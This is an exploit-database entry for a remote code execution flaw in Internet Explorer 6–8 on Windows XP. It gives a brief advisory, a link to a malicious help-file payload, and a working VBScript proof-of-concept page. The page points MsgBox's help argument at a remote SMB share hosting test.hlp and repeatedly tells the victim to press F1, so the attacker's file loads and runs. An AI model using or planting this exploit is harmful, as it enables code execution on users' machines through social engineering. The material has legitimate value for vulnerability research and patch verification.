31 lines
No EOL
1.2 KiB
Text
31 lines
No EOL
1.2 KiB
Text
Microsoft Internet Explorer is prone to a remote code execution vulnerability.
|
|
|
|
Source (iSEC Security Research):
|
|
http://isec.pl/vulnerabilities10.html
|
|
|
|
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.
|
|
|
|
Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.
|
|
|
|
Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
|
|
|
|
===============================================================
|
|
A copy of test.hlp can be downloaded from here:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11615.zip (msgbox_test_help.zip)
|
|
===============================================================
|
|
|
|
<html>
|
|
<script type="text/vbscript">
|
|
big = "\\184.73.14.110\PUBLIC\test.hlp"
|
|
|
|
//For i=1 to 2500
|
|
// big = big & "\..\"
|
|
//Next
|
|
|
|
|
|
MsgBox "please press F1 to save the world", ,"please save the world",
|
|
big, 1
|
|
MsgBox "press F1 to close this annoying popup", ,"", big, 1
|
|
MsgBox "press F1 to close this annoying popup", ,"", big, 1
|
|
</script>
|
|
</html> |